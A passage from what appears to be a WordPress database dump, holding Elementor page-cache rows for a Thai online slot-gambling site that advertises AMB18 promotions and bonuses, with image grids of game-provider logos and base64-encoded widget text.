DlcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMjFcdTBlMzdcdTBlMmRcdTBlMTZcdTBlMzdcdTBlMmRcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMDRcdTBlMmRcdTBlMjFcdTBlMWVcdTBlMzRcdTBlMjdcdTBlNDBcdTBlMTVcdTBlMmRcdTBlMjNcdTBlNGMgXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTI3XHUwZTQ4XHUwZTMyXHUwZTA4XHUwZTMwXHUwZTJkXHUwZTIyXHUwZTM5XHUwZTQ4XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTQ0XHUwZTJiXHUwZTE5XHUwZTAxXHUwZTQ3XHUwZTJiXHUwZTIxXHUwZTM4XHUwZTE5XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTJhXHUwZTFhXHUwZTMyXHUwZTIyIFx1MGUyYVx1MGUyMVx1MGUzMVx1MGUwNFx1MGUyM1x1MGUyMlx1MGUzOVx1MGUyYVx1MGU0M1x1MGUyYlx1MGUyMVx1MGU0OFx1MGUwMVx1MGU0N1x1MGUyMVx1MGUzNVx1MGU0Mlx1MGUxYVx1MGUxOVx1MGUzMVx1MGUyYVx1MGUxZlx1MGUyM1x1MGUzNVx1MGU0M1x1MGUyYlx1MGU0OVx1MGUyM1x1MGUzMVx1MGUxYVx1MGUxN1x1MGUzOFx1MGUwMVx1MGUyN1x1MGUzMVx1MGUxOSBcdTBlMjJcdTBlMzFcdTBlMDdcdTBlMjFcdTBlMzVcdTBlNDJcdTBlMWJcdTBlMjNcdTBlMmJcdTBlMjFcdTBlMzhcdTBlMTlcdTBlMWZcdTBlMjNcdTBlMzVcdTBlMDFcdTBlMzFcdTBlMWFcdTBlNDBcdTBlMDRcdTBlMjNcdTBlMTRcdTBlMzRcdTBlMTVcdTBlMDRcdTBlMzdcdTBlMTlcdTBlMjJcdTBlMmRcdTBlMTRcdTBlNDBcdTBlMmFcdTBlMzVcdTBlMjJcdTBlNDRcdTBlMjdcdTBlNDlcdTBlMGJcdTBlMzFcdTBlMWVcdTBlMWVcdTBlMmRcdTBlMjNcdTBlNGNcdTBlMTVcdTBlMmFcdTBlMzJcdTBlMjJcdTBlMjVcdTBlMzhcdTBlMjJcdTBlMmRcdTBlMzVcdTBlMDFcdTBlMTRcdTBlNDlcdTBlMjdcdTBlMjJcdTBlNDBcdTBlMmJcdTBlMjFcdTBlMzJcdTBlMzBcdTBlMDFcdTBlMzFcdTBlMWFcdTBlMDRcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMmRcdTBlMjJcdTBlMzJcdTBlMDFcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMWJcdTBlMjNcdTBlMzBcdTBlMmFcdTBlMWFcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMTNcdTBlNGNcdTBlNDBcdTBlMjVcdTBlNDhcdTBlMTlcdTBlMmFcdTBlMTlcdTBlMzhcdTBlMDEgXHUwZTE1XHUwZTM3XHUwZTQ4XHUwZTE5XHUwZTQwXHUwZTE1XHUwZTQ5XHUwZTE5XHUwZTQxXHUwZTFhXHUwZTFhXHUwZTA4XHUwZTMxXHUwZTE0XHUwZTQwXHUwZTE1XHUwZTQ3XHUwZTIxXHUwZTFlXHUwZTIzXHUwZTQ5XHUwZTJkXHUwZTIxXHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTFkXHUwZTMyXHUwZTAxXHUwZTE2XHUwZTJkXHUwZTE5XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTIzXHUwZTI3XHUwZTE0XHUwZTQwXHUwZTIzXHUwZTQ3XHUwZTI3XHUwZTE3XHUwZTMxXHUwZTE5XHUwZTQzXHUwZTA4XHUwZTE3XHUwZTMzXHUwZTIzXHUwZTMyXHUwZTIyXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTE1XHUwZTQ5XHUwZTJkXHUwZTA3XHUwZTIzXHUwZTJkXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTQwXHUwZTJhXHUwZTM1XHUwZTIyXHUwZTJkXHUwZTMyXHUwZTIzXHUwZTIxXHUwZTEzXHUwZTRjIFx1MGUxN1x1MGUzMVx1MGU0OVx1MGUwN1x1MGUxOVx1MGUzNVx1MGU0OVx1MGUwNFx1MGUyN1x1MGUyM1x1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUyZFx1MGUyMlx1MGU0OFx1MGUzMlx1MGUwN1x1MGUyMVx1MGUzNVx1MGUyYVx1MGUxNVx1MGUzNFx1MGUyN1x1MGUzMlx1MGUwN1x1MGU0MVx1MGUxY1x1MGUxOVx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0MFx1MGUwN1x1MGUzNFx1MGUxOVx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxNFx1MGUzNSBcdTBlNDFcdTBlMjVcdTBlMzBcdTBlNDBcdTBlMWJcdTBlMzRcdTBlMTRcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMWFcdTBlMjNcdTBlMzRcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMmFcdTBlMzNcdTBlMmJcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMWNcdTBlMzlcdTBlNDlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMjFcdTBlMzVcdTBlMmRcdTBlMzJcdTBlMjJcdTBlMzggMTggXHUwZTFiXHUwZTM1XHUwZTAyXHUwZTM2XHUwZTQ5XHUwZTE5XHUwZTQ0XHUwZTFiXHUwZTQwXHUwZTE3XHUwZTQ4XHUwZTMyXHUwZTE5XHUwZTMxXHUwZTQ5XHUwZTE5IFx1MGU0MFx1MGUxZVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGUxYVx1MGUzMVx1MGUxOVx1MGU0MFx1MGUxN1x1MGUzNFx1MGUwN1x1MGUyZFx1MGUyMlx1MGU0OFx1MGUzMlx1MGUwN1x1MGUyMVx1MGUzNVx1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGUyM1x1MGUzMVx1MGUxYVx1MGUxY1x1MGUzNFx1MGUxNFx1MGUwYVx1MGUyZFx1MGUxYVx1MGUxNVx1MGU0OFx1MGUyZFx1MGUxNVx1MGUzMVx1MGUyN1x1MGU0MFx1MGUyZFx1MGUwN1x1MGU0M1x1MGUxOVx1MGUyM1x1MGUzMFx1MGUyMlx1MGUzMFx1MGUyMlx1MGUzMlx1MGUyNzxcL3A+In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0=\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-953f46b elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"953f46b\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-cca046d\\\" data-id=\\\"cca046d\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-6986c03 elementor-widget elementor-widget-image\\\" data-id=\\\"6986c03\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"651\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG-1.webp\\\" class=\\\"elementor-animation-pulse-shrink attachment-full size-full wp-image-360\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG-1.webp 651w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG-1-300x230.webp 300w\\\" sizes=\\\"(max-width: 651px) 100vw, 651px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-9ee3b73\\\" data-id=\\\"9ee3b73\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-313c578 elementor-widget elementor-widget-image\\\" data-id=\\\"313c578\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"314\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming-1.webp\\\" class=\\\"elementor-animation-pulse-shrink attachment-full size-full wp-image-359\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming-1.webp 314w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming-1-188x300.webp 188w\\\" sizes=\\\"(max-width: 314px) 100vw, 314px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-053c361\\\" data-id=\\\"053c361\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-60b9d1b elementor-widget elementor-widget-image\\\" data-id=\\\"60b9d1b\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"314\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI-1.webp\\\" class=\\\"elementor-animation-pulse-shrink attachment-full size-full wp-image-356\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI-1.webp 314w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI-1-188x300.webp 188w\\\" sizes=\\\"(max-width: 314px) 100vw, 314px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-d93020a elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"d93020a\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-68262e3\\\" data-id=\\\"68262e3\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-05f18b4 elementor-widget elementor-widget-image\\\" data-id=\\\"05f18b4\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"314\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\\\" class=\\\"elementor-animation-pulse-shrink attachment-full size-full wp-image-292\\\" alt=\\\"JOKER\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp 314w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER-188x300.webp 188w\\\" sizes=\\\"(max-width: 314px) 100vw, 314px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-268ff30\\\" data-id=\\\"268ff30\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-a316455 elementor-widget elementor-widget-image\\\" data-id=\\\"a316455\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"314\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo-1.webp\\\" class=\\\"elementor-animation-pulse-shrink attachment-full size-full wp-image-364\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo-1.webp 314w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo-1-188x300.webp 188w\\\" sizes=\\\"(max-width: 314px) 100vw, 314px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-db9361a\\\" data-id=\\\"db9361a\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-5a3a81d elementor-widget elementor-widget-image\\\" data-id=\\\"5a3a81d\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"651\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic-1.webp\\\" class=\\\"elementor-animation-pulse-shrink attachment-full size-full wp-image-361\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic-1.webp 651w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic-1-300x230.webp 300w\\\" sizes=\\\"(max-width: 651px) 100vw, 651px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),(3585,27,'_elementor_page_assets','a:2:{s:6:\"styles\";a:2:{i:0;s:14:\"widget-heading\";i:1;s:12:\"widget-image\";}s:7:\"scripts\";a:1:{i:0;s:18:\"elementor-frontend\";}}'),(3586,27,'_elementor_css','a:6:{s:4:\"time\";i:1788460948;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3587,27,'_elementor_element_cache','{\"timeout\":1788665158,\"value\":{\"content\":\"\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-d070aea elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"d070aea\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4d6b9b4\\\" data-id=\\\"4d6b9b4\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-db612d4 elementor-widget elementor-widget-heading\\\" data-id=\\\"db612d4\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h1 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 AMB18 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19<\\/h1>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6ImFmZjIxODYiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBkYXRhLXBtLXNsaWNlPVwiMCAwIFtdXCI+XHUwZTQyXHUwZTFiXHUwZTIzXHUwZTQyXHUwZTIxXHUwZTBhXHUwZTMxXHUwZTQ4XHUwZTE5XHUwZTE1XHUwZTMxXHUwZTI3XHUwZTE1XHUwZTM2XHUwZTA3XHUwZTA4XHUwZTMyXHUwZTAxIEFNQjE4IFx1MGUwOFx1MGUzMVx1MGUxNFx1MGU0MFx1MGUxNVx1MGU0N1x1MGUyMVx1MGU0MFx1MGUxZVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUyYVx1MGUzMlx1MGUyMlx1MGUyYVx1MGUyNVx1MGU0N1x1MGUyZFx1MGUxNVx1MGUxNVx1MGUzMVx1MGUyN1x1MGUwOFx1MGUyM1x1MGUzNFx1MGUwN1x1MGUwMVx1MGUzMVx1MGUxYVx1MGU0Mlx1MGUxYlx1MGUyM1x1MGUyYVx1MGUyMVx1MGUzMVx1MGUwNFx1MGUyM1x1MGU0M1x1MGUyYlx1MGUyMVx1MGU0OFx1MGUyM1x1MGUzMVx1MGUxYVx1MGU0Mlx1MGUxYVx1MGUxOVx1MGUzMVx1MGUyYVx1MGUxZlx1MGUyM1x1MGUzNSAxMDAlIFx1MGU0MFx1MGUxZVx1MGUzNFx1MGU0OFx1MGUyMVx1MGUxZVx1MGUyNVx1MGUzMVx1MGUwN1x1MGU0M1x1MGUyYlx1MGU0OVx1MGUyYVx1MGUxOVx1MGUzOFx1MGUwMVx1MGU0NFx1MGUxNFx1MGU0OVx1MGUxNVx1MGUzMVx1MGU0OVx1MGUwN1x1MGU0MVx1MGUxNVx1MGU0OFx1MGUwMVx1MGU0OVx1MGUzMlx1MGUyN1x1MGU0MVx1MGUyM1x1MGUwMVx1MGU0MFx1MGUxNVx1MGUzNFx1MGUyMVx1MGU0NFx1MGUyMVx1MGU0OFx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwN1x1MGUyYlx1MGUxOVx1MGUzMVx1MGUwMVx1MGUwMVx1MGU0N1x1MGUyMVx1MGUzNVx1MGUyYVx1MGUzNFx1MGUxN1x1MGUxOFx1MGUzNFx1MGU0Y1x1MGUyNVx1MGUzOFx1MGU0OVx1MGUxOVx1MGUyMVx1MGUzMVx1MGUxOVx1MGUyYVx1MGU0Y1x1MGU0NFx1MGUxNFx1MGU0OVx1MGU0MFx1MGUyYlx1MGUyMVx1MGUzN1x1MGUyZFx1MGUxOVx1MGUwMVx1MGUzMVx1MGUxOSBcdTBlNDFcdTBlMTZcdTBlMjFcdTBlNDBcdTBlMDdcdTBlMzdcdTBlNDhcdTBlMmRcdTBlMTlcdTBlNDRcdTBlMDJcdTBlMTZcdTBlMmRcdTBlMTlcdTBlNDRcdTBlMjFcdTBlNDhcdTBlMmRcdTBlMzFcdTBlNDlcdTBlMTkgXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTQxXHUwZTFhXHUwZTFhXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTE1XHUwZTQ5XHUwZTJkXHUwZTA3XHUwZTAxXHUwZTMxXHUwZTRhXHUwZTAxXHUwZTIzXHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMxXHUwZTFhXHUwZTA0XHUwZTIzXHUwZTFhXHUwZTE3XHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTJhXHUwZTIxXHUwZTMyXHUwZTBhXHUwZTM0XHUwZTAxXHUwZTQzXHUwZTJiXHUwZTIxXHUwZTQ4XHUwZTQxXHUwZTI1XHUwZTMwXHUwZTJhXHUwZTIxXHUwZTMyXHUwZTBhXHUwZTM0XHUwZTAxXHUwZTFiXHUwZTMxXHUwZTA4XHUwZTA4XHUwZTM4XHUwZTFhXHUwZTMxXHUwZTE5XHUwZTQzXHUwZTA0XHUwZTIzXHUwZTJkXHUwZTIyXHUwZTM5XHUwZTQ4XHUwZTE3XHUwZTM1XHUwZTIxXHUwZTQ0XHUwZTJiXHUwZTE5XHUwZTAxXHUwZTQ3XHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTIzXHUwZTQ4XHUwZTI3XHUwZTIxXHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTJiXHUwZTIxXHUwZTE0XHUwZTIzXHUwZTI3XHUwZTIxXHUwZTQyXHUwZTFiXHUwZTIzXHUwZTJhXHUwZTI1XHUwZTQ3XHUwZTJkXHUwZTE1XHUwZTIxXHUwZTMyXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTQxXHUwZTFhXHUwZTFhXHUwZTA4XHUwZTM4XHUwZTAxIFx1MGU0NiBcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlNDJcdTBlMWFcdTBlMTlcdTBlMzFcdTBlMmFcdTBlMWRcdTBlMzJcdTBlMDFcdTBlMDRcdTBlMjNcdTBlMzFcdTBlNDlcdTBlMDdcdTBlNDFcdTBlMjNcdTBlMDEgXHUwZTQyXHUwZTFhXHUwZTE5XHUwZTMxXHUwZTJhXHUwZTFkXHUwZTMyXHUwZTAxXHUwZTFiXHUwZTIzXHUwZTMwXHUwZTA4XHUwZTMzIFx1MGU0Mlx1MGUxYlx1MGUyM1x1MGUwNFx1MGUzN1x1MGUxOVx1MGUyMlx1MGUyZFx1MGUxNFx1MGU0MFx1MGUyYVx1MGUzNVx1MGUyMiBcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMDFcdTBlMzRcdTBlMDhcdTBlMDFcdTBlMjNcdTBlMjNcdTBlMjFcdTBlMWVcdTBlMzRcdTBlNDBcdTBlMjhcdTBlMjlcdTBlMTVcdTBlMzJcdTBlMjFcdTBlNDBcdTBlMTdcdTBlMjhcdTBlMDFcdTBlMzJcdTBlMjVcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMmFcdTBlMjVcdTBlMzFcdTBlMWFcdTBlMjFcdTBlMzJcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMjNcdTBlNDhcdTBlMjdcdTBlMjFcdTBlMmFcdTBlMTlcdTBlMzhcdTBlMDFcdTBlMTVcdTBlMjVcdTBlMmRcdTBlMTRcdTBlMWJcdTBlMzVcdTBlMmRcdTBlMzFcdTBlMWJcdTBlNDBcdTBlMTRcdTBlMTVcdTBlNDNcdTBlMmJcdTBlMjFcdTBlNDhcdTBlNDBcdTBlMjNcdTBlMzdcdTBlNDhcdTBlMmRcdTBlMjIgXHUwZTQ2IFx1MGU0NFx1MGUyMVx1MGU0OFx1MGUyMVx1MGUzNVx1MGU0MFx1MGUyZFx1MGUzMlx1MGUxNVx1MGU0YyBcdTBlMGFcdTBlNDhcdTBlMjdcdTBlMjJcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMTdcdTBlMzhcdTBlMDFcdTBlMjJcdTBlMmRcdTBlMTRcdTBlNDBcdTBlMTRcdTBlMzRcdTBlMjFcdTBlMWVcdTBlMzFcdTBlMTlcdTBlMTRcdTBlMzlcdTBlMDRcdTBlMzhcdTBlNDlcdTBlMjFcdTBlMDJcdTBlMzZcdTBlNDlcdTBlMTlcdTBlNDFcdTBlMWFcdTBlMWFcdTBlNDBcdTBlMmJcdTBlNDdcdTBlMTlcdTBlMGFcdTBlMzFcdTBlMTQgXHUwZTQwXHUwZTIzXHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTAxXHUwZTQ3XHUwZTJiXHUwZTMyXHUwZTIyXHUwZTJiXHUwZTQ4XHUwZTI3XHUwZTA3XHUwZTQwXHUwZTFlXHUwZTIzXHUwZTMyXHUwZTMwXHUwZTFkXHUwZTMyXHUwZTAxXHUwZTE2XHUwZTJkXHUwZTE5XHUwZTJkXHUwZTMxXHUwZTE1XHUwZTQyXHUwZTE5XHUwZTIxXHUwZTMxXHUwZTE1XHUwZTM0XHUwZTE3XHUwZTMzXHUwZTIzXHUwZTMyXHUwZTIyXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQ0XHUwZTI3XHUwZTQxXHUwZTFhXHUwZTFhXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTE1XHUwZTQ5XHUwZTJkXHUwZTA3XHUwZTIzXHUwZTJkXHUwZTE5XHUwZTMyXHUwZTE5IFx1MGUxYlx1MGUyNVx1MGUyZFx1MGUxNFx1MGUyMFx1MGUzMVx1MGUyMiBcdTBlMjFcdTBlMzFcdTBlNDhcdTBlMTlcdTBlNDNcdTBlMDhcdTBlNDRcdTBlMTRcdTBlNDkgXHUwZTIzXHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMxXHUwZTFhXHUwZTE4XHUwZTE5XHUwZTMyXHUwZTA0XHUwZTMyXHUwZTIzXHUwZTBhXHUwZTMxXHUwZTQ5XHUwZTE5XHUwZTE5XHUwZTMzIFx1MGU0M1x1MGUwYVx1MGU0OVx1MGUwN1x1MGUzMlx1MGUxOVx1MGUwN1x1MGU0OFx1MGUzMlx1MGUyMlx1MGUxYVx1MGUxOVx1MGUyZFx1MGUyZFx1MGUxOVx1MGU0NFx1MGUyNVx1MGUxOVx1MGU0YyBcdTBlMTVcdTBlMmRcdTBlMWFcdTBlNDJcdTBlMDhcdTBlMTdcdTBlMjJcdTBlNGNcdTBlMmFcdTBlMzJcdTBlMjJcdTBlNDBcdTBlMmRcdTBlNDdcdTBlMTlcdTBlNDBcdTBlMTVcdTBlMmRcdTBlMjNcdTBlNGNcdTBlNDBcdTBlMTdcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMmRcdTBlMjJcdTBlMzJcdTBlMDFcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMTVcdTBlMzdcdTBlNDhcdTBlMTlcdTBlNDBcdTBlMTVcdTBlNDlcdTBlMTlcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMmFcdTBlMzBcdTBlMTRcdTBlMjdcdTBlMDFcdTBlNDNcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDBcdTBlMTRcdTBlMzVcdTBlMjJcdTBlMjcgXHUwZTQxXHUwZTE1XHUwZTQ4XHUwZTE2XHUwZTM2XHUwZTA3XHUwZTQyXHUwZTFiXHUwZTIzXHUwZTA4XHUwZTMwXHUwZTFiXHUwZTMxXHUwZTA3XHUwZTQxXHUwZTA0XHUwZTQ4XHUwZTQ0XHUwZTJiXHUwZTE5XHUwZTAxXHUwZTQ3XHUwZTJkXHUwZTIyXHUwZTQ4XHUwZTMyXHUwZTI1XHUwZTM3XHUwZTIxXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTQxXHUwZTFhXHUwZTFhXHUwZTIxXHUwZTM1XHUwZTJhXHUwZTE1XHUwZTM0XHUwZTI3XHUwZTMyXHUwZTA3XHUwZTQxXHUwZTFjXHUwZTE5XHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQwXHUwZTA3XHUw